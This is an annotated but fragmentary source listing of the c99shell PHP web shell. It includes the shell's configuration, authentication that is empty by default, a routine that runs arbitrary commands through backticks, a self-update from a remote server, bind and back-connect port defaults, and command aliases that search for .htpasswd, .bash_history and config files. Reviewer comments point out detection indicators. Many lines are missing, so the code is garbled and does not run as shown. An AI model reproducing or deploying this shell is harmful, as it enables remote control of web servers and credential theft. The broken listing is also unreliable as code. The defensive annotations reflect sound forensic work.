<?php
// Start-up: store a start timestamp in the constant "starttime".
// getmicrotime() is not defined anywhere in the visible part of the file.
define("starttime",getmicrotime
());
// Emulates the removed register_globals setting: every key in $_REQUEST is
// turned into a global variable of the same name unless such a variable is
// already set. Variables that the code below reads without assigning them
// first ($act, $set_surl, $selfwrite, ...) can therefore be supplied directly
// by whoever sends the request.
// Triage note: a `$$k = $v` loop over $_REQUEST at the top of a PHP file is a
// strong static indicator when reviewing a web root for planted shells.
foreach($_REQUEST as $k=>
$v) {if (!
isset($$k)) {$$k =
$v;
}}
$shver = "1.0 pre-release build #16"; //Current version string
//CONFIGURATION AND SETTINGS
// NOTE(review): the `if` branch that this `elseif` continues is missing from
// the listing, so this chain does not parse as shown.
// $surl is the base URL the shell uses for links back to itself. $set_surl is
// not assigned in the visible code; it can arrive as a request parameter via
// the import loop at the top of the file, and is copied unvalidated into the
// "c99sh_surl" cookie. That cookie name is a usable indicator in proxy or
// web-server logs.
elseif (!
empty($set_surl)) {$surl =
$set_surl;
setcookie("c99sh_surl",
$surl);
}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE, look for request variables whose value is a URL and carry them over into SURL.
// Walks the raw query string and keeps every parameter whose decoded value
// starts with http://, https://, ssl://, ftp:// or a UNC prefix, re-encoding
// it into $includestr so that it is repeated on every self-link.
// Presumably this keeps the shell reachable when it is loaded through another
// script's include parameter (inferred from the variable name; confirm).
// Requests whose parameter values begin with these schemes are worth alerting on.
// NOTE(review): $include is assigned "&" here but the visible code appends to
// $includestr, which is never initialised in view.
if ($surl_autofill_include and !
$_REQUEST["c99sh_surl"]) {$include =
"&";
foreach (explode("&",
getenv("QUERY_STRING")) as $v) {$v =
explode("=",
$v);
$name =
urldecode($v[0]);
$value =
urldecode($v[1]);
foreach (array("http://",
"https://",
"ssl://",
"ftp://",
"\\\\") as $needle) {if (strpos($value,
$needle) ===
0) {$includestr .=
urlencode($name).
"=".
urlencode($value).
"&";
}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .=
"surl_autofill_include=1&";
}}
// NOTE(review): the condition that guarded this block is missing from the listing.
{
$surl = "?".$includestr; //Self url
}
$timelimit = 0; //Execution time limit in seconds, overriding the server quota; 0 = unlimited.
//Authentication
// As shipped, login and password are both empty strings and the host
// allow-list is a single wildcard, so the values below impose no restriction
// unless whoever deploys the file edits them. A shell found with these
// defaults should be assumed usable by anyone who knows its URL.
$login = ""; //login
//DON'T FORGET ABOUT THE PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //MD5 of the password (unsalted). If empty, md5($pass) is used.
$host_allow =
array("*");
//array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode output with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
// Both servers are addressed over plain http. Outbound requests from a web
// server to these hosts are a network indicator for this family.
$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
// Forensics note: per the author's comment this flag keeps modify and access
// times unchanged on files the shell works with (the code honouring it is not
// in view). Timelines built only from mtime/atime should be cross-checked
// against web-server logs and other metadata.
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish a free shell and wish to
add a link to your site or any other information,
put your html here. */
$donated_act =
array("");
//array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for temporary files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory for logs of long-running processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting: 0 = column number, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
// NOTE(review): the `$variable = array(` line that opens this literal is
// missing from the listing; only the entries and the closing `);` survive.
// Each key is a viewer action and each value the file extensions routed to it.
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
// NOTE(review): the opening assignment of this second literal is missing too.
// Keys are command templates and values the extensions they apply to. The
// first key is built from the PHPRC environment variable; the second runs the
// file with perl. How %f% is substituted is not visible here.
getenv("PHPRC").
" -q %f%" =>
array("php",
"php3",
"php4"),
"perl %f%" =>
array("pl",
"cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
// The first rule matches the script's own file name (basename of PHP_SELF)
// and wraps it in a yellow <font> tag in listings; the second marks
// "config.php".
$regxp_highlight =
array(
array(basename($_SERVER["PHP_SELF"]),
1,
"<font color=\"yellow\">",
"</font>"),
// example
array("config.php",
1) // example
);
$safemode_diskettes =
array("a");
// Drive letters for which diskette errors are disabled.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
// Defaults for the network helpers. The code that uses them is not in view.
// For detection: an unexpected listener on TCP 31373 or 8081 owned by the
// web-server account, or an outbound connection to port 31373, matches these
// shipped defaults (an operator can change them).
$bindport_pass = "c99"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
// Each entry is array({menu label}, {shell command}). $win is not assigned in
// the visible code; the branch chosen depends on it.
// NOTE(review): the `$variable = array(` opener is missing from both branches
// in this listing.
// The non-Windows list enumerates SUID/SGID binaries, world-writable paths and
// files that commonly hold credentials (.htpasswd, .bash_history,
// .fetchmailrc, service.pwd, config*). For detection, these exact command
// lines executed as a child of the web-server or PHP process are a
// high-confidence signal in process-execution telemetry.
if (!$win)
{
array("-----------------------------------------------------------",
"ls -la"),
array("find all suid files",
"find / -type f -perm -04000 -ls"),
array("find suid files in current dir",
"find . -type f -perm -04000 -ls"),
array("find all sgid files",
"find / -type f -perm -02000 -ls"),
array("find sgid files in current dir",
"find . -type f -perm -02000 -ls"),
array("find config.inc.php files",
"find / -type f -name config.inc.php"),
array("find config* files",
"find / -type f -name \"config*\""),
array("find config* files in current dir",
"find . -type f -name \"config*\""),
array("find all writable folders and files",
"find / -perm -2 -ls"),
array("find all writable folders and files in current dir",
"find . -perm -2 -ls"),
array("find all service.pwd files",
"find / -type f -name service.pwd"),
array("find service.pwd files in current dir",
"find . -type f -name service.pwd"),
array("find all .htpasswd files",
"find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir",
"find . -type f -name .htpasswd"),
array("find all .bash_history files",
"find / -type f -name .bash_history"),
array("find .bash_history files in current dir",
"find . -type f -name .bash_history"),
array("find all .fetchmailrc files",
"find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir",
"find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system",
"lsattr -va"),
array("show opened ports",
"netstat -an | grep -i listen")
);
}
else
{
// Windows variant: directory listing and open ports only.
array("-----------------------------------------------------------",
"dir"),
array("show opened ports",
"netstat -an")
);
}
// Name of the cookie that carries the shell's session state; "c99shvars" in
// request or response headers is a usable log indicator.
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
//Quick launch
// Each entry is array({html label}, {link target}). Targets are $surl plus an
// `act=` parameter naming the feature; %d, %upd and %sort are placeholders
// whose substitution happens outside the visible code.
// NOTE(review): the `$variable = array(` opener is missing from the listing.
// For log hunting, the act values listed here (img, ls, search, fsbuff,
// encoder, tools, processes, ftpquickbrute, security, sql, eval, update,
// feedback, selfremove) appearing as query parameters on a single PHP file
// identify requests to this shell.
// $surl is written into the HTML attributes without escaping, and earlier in
// the file it can be taken from request data.
array("<img src=\"".
$surl.
"act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",
$surl),
array("<img src=\"".
$surl.
"act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">",
"#\" onclick=\"history.back(1)"),
array("<img src=\"".
$surl.
"act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">",
"#\" onclick=\"history.go(1)"),
array("<img src=\"".
$surl.
"act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=ls&d=%upd&sort=%sort"),
array("<img src=\"".
$surl.
"act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",
""),
array("<img src=\"".
$surl.
"act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=search&d=%d"),
array("<img src=\"".
$surl.
"act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=fsbuff&d=%d"),
array("<b>Encoder</b>",
$surl.
"act=encoder&d=%d"),
array("<b>Tools</b>",
$surl.
"act=tools&d=%d"),
array("<b>Proc.</b>",
$surl.
"act=processes&d=%d"),
array("<b>FTP brute</b>",
$surl.
"act=ftpquickbrute&d=%d"),
array("<b>Sec.</b>",
$surl.
"act=security&d=%d"),
array("<b>SQL</b>",
$surl.
"act=sql&d=%d"),
array("<b>PHP-code</b>",
$surl.
"act=eval&d=%d"),
array("<b>Update</b>",
$surl.
"act=update&d=%d"),
array("<b>Feedback</b>",
$surl.
"act=feedback&d=%d"),
array("<b>Self remove</b>",
$surl.
"act=selfremove"),
array("<b>Logout</b>",
"#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
// Takes the file name to operate on straight from the request; @ suppresses
// the notice when the parameter is absent.
@$f = $_REQUEST["f"];
//END CONFIGURATION
// \/The code below is not meant to be edited\/
// Builds a case-insensitive, fully anchored alternation pattern from $tmp.
// $tmp is populated outside the visible lines; presumably it is derived from
// the $host_allow masks (confirm against the full file).
$s =
"!^(".
implode("|",
$tmp).
")$!i";
// HTTP Basic authentication check.
// NOTE(review): the condition that guarded this block is missing from the listing.
{
// Falls back to the unsalted MD5 of the configured plaintext password.
if (empty($md5_pass)) {$md5_pass =
md5($pass);
}
// Both comparisons use loose `!=`, so PHP type juggling applies to the login
// and to the two MD5 hex strings. With the shipped empty login and password
// the check is satisfied by empty credentials.
if (($_SERVER["PHP_AUTH_USER"] !=
$login) or
(md5($_SERVER["PHP_AUTH_PW"]) !=
$md5_pass))
{
// The realm string contains the literal "c99shell" plus the version, so a
// 401 response carrying it fingerprints the shell in scans and proxy logs.
header("WWW-Authenticate: Basic realm=\"c99shell ".
$shver.
": ".
$login_txt.
"\"");
header("HTTP/1.0 401 Unauthorized");
// NOTE(review): no exit follows the 401 in the visible lines; if none exists
// in the full file, execution would continue past a failed check.
}
}
// Everything in this branch is skipped for act=img requests.
// NOTE(review): the matching closing brace of this `if` cannot be located
// reliably because lines are missing from the listing.
if ($act != "img")
{
// Self-update path. $selfwrite is not assigned in the visible code, so it can
// arrive as a request parameter through the import loop at the top of the
// file. c99sh_getupdate() is defined elsewhere; presumably it fetches code
// from the configured update server (confirm). The output buffer is cleared
// first and the script exits afterwards.
if ($selfwrite or
$updatenow) {@
ob_clean(); c99sh_getupdate
($selfwrite,
1);
exit;
}
// Ensures the "copy" list of the file buffer exists before it is used.
if (!
is_array($sess_data["copy"])) {$sess_data["copy"] =
array();
}
// Reads the server's disable_functions hardening list and splits it on commas
// into an array. The shell inspects which functions are blocked, so a
// disable_functions policy should be treated as one layer, not as the
// control that stops a shell like this.
$disablefunc = @
ini_get("disable_functions");
if (!
empty($disablefunc))
{
$disablefunc =
explode(",",
$disablefunc);
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Normalises the copy/cut file buffer: resolves every stored path with
// realpath(), converts backslashes to DIRECTORY_SEPARATOR, sorts the copy
// list, and removes an entry from one list when the same index in the other
// list holds the same path.
// NOTE(review): no `global` declaration is visible, so as shown $sess_data
// and $act are function-local and the function has no effect outside itself.
function c99_buff_prepare()
{
foreach($sess_data["copy"] as $k=>
$v) {$sess_data["copy"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,
realpath($v));
}
foreach($sess_data["cut"] as $k=>
$v) {$sess_data["cut"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,
realpath($v));
}
// Only the copy list is sorted (and re-indexed); the cut list keeps its keys,
// so the index-by-index comparison below pairs unrelated entries.
sort($sess_data["copy"]);
if ($act !=
"copy") {foreach($sess_data["cut"] as $k=>
$v) {if ($sess_data["copy"][$k] ==
$v) {unset($sess_data["copy"][$k]);
}}}
else {foreach($sess_data["copy"] as $k=>
$v) {if ($sess_data["cut"][$k] ==
$v) {unset($sess_data["cut"][$k]);
}}}
}
}
c99_buff_prepare();
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Stores $data as the session state after normalising the file buffer.
// As shown, the value is only assigned to a local $sess_data; any code that
// persists it (for example into the session cookie) is not in the visible
// lines.
function c99_sess_put($data)
{
c99_buff_prepare();
$sess_data = $data;
}
}
// Imports the "sort" and "sql_sort" parameters into variables of the same
// name. GET is read first and POST second, so a non-empty POST value wins.
// The values are not validated here.
foreach (array("sort",
"sql_sort") as $v)
{
if (!
empty($_GET[$v])) {$$v =
$_GET[$v];
}
if (!
empty($_POST[$v])) {$$v =
$_POST[$v];
}
}
// NOTE(review): the body of this branch is empty in the listing; the code
// that saves the sort position appears to be missing.
if ($sort_save)
{
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Shortens a string for display: keeps the first $len and last $len bytes
// joined by "...", otherwise returns $content unchanged.
// NOTE(review): the `if` condition selecting the shortening branch is missing
// from the listing, so the function does not parse as shown.
// substr() is byte-based, so multi-byte text may be cut inside a character.
function str2mini($content,$len)
{
{
return substr($content,
0,
$len).
"...".
substr($content,-
$len);
}
else {return $content;}
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Formats a byte count for display with binary units: values of at least
// 1024^3 as GB, 1024^2 as MB, 1024 as KB, anything smaller as B. Scaled
// values are rounded to two decimals (round(x*100)/100).
// NOTE(review): the `if` branch preceding the `else` below is missing from
// the listing.
function view_size($size)
{
else
{
if ($size >=
1073741824) {$size =
round($size/
1073741824*
100)/
100 .
" GB";
}
elseif ($size >=
1048576) {$size =
round($size/
1048576*
100)/
100 .
" MB";
}
elseif ($size >=
1024) {$size =
round($size/
1024*
100)/
100 .
" KB";
}
else {$size = $size . " B";}
return $size;
}
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Recursively copies the contents of directory $d into directory $t.
// Returns TRUE when the loop completes, or the falsy result of the first
// copy()/mkdir() that fails.
// NOTE(review): the call that opens the directory handle $h is missing from
// the listing, and no closedir() is visible.
function fs_copy_dir($d,$t)
{
// Make sure the source path ends with a separator. The joins below add
// another one, producing doubled separators.
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
// Plain entries are copied; is_dir() follows symbolic links, so a link to a
// directory is treated as a directory.
if (!
is_dir($d.DIRECTORY_SEPARATOR.
$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
// For directories only the mkdir() result is kept; the return value of the
// recursive call is discarded, so failures deeper in the tree go unreported.
else {$ret =
mkdir($t.DIRECTORY_SEPARATOR.
$o); fs_copy_dir
($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
if (!$ret) {return $ret;}
}
}
return TRUE;
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Copies a filesystem object from $d to $t. The visible branch appends a
// trailing separator to both paths and delegates to fs_copy_dir(); the final
// branch returns FALSE.
// NOTE(review): the conditions selecting the branches, and any branch for
// plain files, are missing from the listing.
function fs_copy_obj($d,$t)
{
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
if (substr($t,
-1) != DIRECTORY_SEPARATOR
) {$t .= DIRECTORY_SEPARATOR;
}
return fs_copy_dir($d,$t);
}
else {return FALSE;}
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Walks directory $d and copies each entry to $t. Returns TRUE when the loop
// completes, or a falsy $ret as soon as one entry fails.
// NOTE(review): the call that opens the handle $h is missing from the
// listing, and nothing in the visible lines removes the source entries.
function fs_move_dir($d,$t)
{
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
$ret = TRUE;
if (!
is_dir($d.DIRECTORY_SEPARATOR.
$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
// NOTE(review): as written, a successful mkdir() plus recursive copy sets
// $ret to FALSE, so the function returns FALSE on success for a
// subdirectory. This looks inverted, or lines are missing here.
else {if (mkdir($t.DIRECTORY_SEPARATOR.
$o) and fs_copy_dir
($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o)) {$ret =
FALSE;
}}
if (!$ret) {return $ret;}
}
}
return TRUE;
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Moves a filesystem object from $d to $t. The visible directory branch
// appends trailing separators and delegates to fs_move_dir(); another branch
// deletes the target with unlink($t) and returns FALSE; the final branch
// returns FALSE.
// NOTE(review): the conditions for all branches are missing from the
// listing, so the control flow does not parse as shown.
function fs_move_obj($d,$t)
{
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
if (substr($t,
-1) != DIRECTORY_SEPARATOR
) {$t .= DIRECTORY_SEPARATOR;
}
return fs_move_dir($d,$t);
}
{
// Presumably cleanup of a partially written target after a failed step (confirm).
else {unlink($t);
return FALSE;
}
}
else {return FALSE;}
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Recursively removes the contents of directory $d, which is expected to end
// with a separator because entries are appended to it directly. For
// subdirectories it recurses and then calls rmdir().
// NOTE(review): the call that opens the handle $h and the branch handling
// plain files are missing from the listing. No return statement is visible,
// yet fs_rmobj() returns this function's result.
function fs_rmdir($d)
{
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
else {fs_rmdir
($d.
$o.DIRECTORY_SEPARATOR
);
rmdir($d.
$o);
}
}
}
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Removes a filesystem object. The visible branch appends a trailing
// separator to $o and delegates to fs_rmdir(); the final branch returns FALSE.
// NOTE(review): the conditions selecting the branches, and any branch for
// plain files, are missing from the listing.
function fs_rmobj($o)
{
{
if (substr($o,
-1) != DIRECTORY_SEPARATOR
) {$o .= DIRECTORY_SEPARATOR;
}
return fs_rmdir($o);
}
else {return FALSE;}
}
}
// NOTE(review): the guard that preceded this brace is missing from the listing.
{
// Runs $cmd on the host and returns its output as a string ("" when nothing
// is captured). This is the command-execution core of the shell.
// The listing keeps only fragments of an if/elseif chain: the backtick
// operator, and a loop reading 1024-byte chunks from a stream handle $fp
// whose opening call is not in view.
// Defender notes: $cmd reaches the system shell unmodified. Because the chain
// offers more than one execution primitive, blocking a single PHP function
// does not remove the capability. Alerting on shell processes spawned by the
// web-server or PHP worker account is the more reliable detection.
function myshellexec($cmd)
{
$result = "";
{
elseif (($result = `$cmd`) !== FALSE) {}
{
$result = "";
while(!
feof($fp)) {$result .=
fread($fp,
1024);
}
}
}
return $result;
}
}
{
function view_perms($mode)
{
if (($mode & 0xC000) === 0xC000) {$type = "s";}
elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
else {$type = "?";}
$owner["read"] = ($mode & 00400)?"r":"-";
$owner["write"] = ($mode & 00200)?"w":"-";
$owner["execute"] = ($mode & 00100)?"x":"-";
$group["read"] = ($mode & 00040)?"r":"-";
$group["write"] = ($mode & 00020)?"w":"-";
$group["execute"] = ($mode & 00010)?"x":"-";
$world["read"] = ($mode & 00004)?"r":"-";
$world["write"] = ($mode & 00002)? "w":"-";
$world["execute"] = (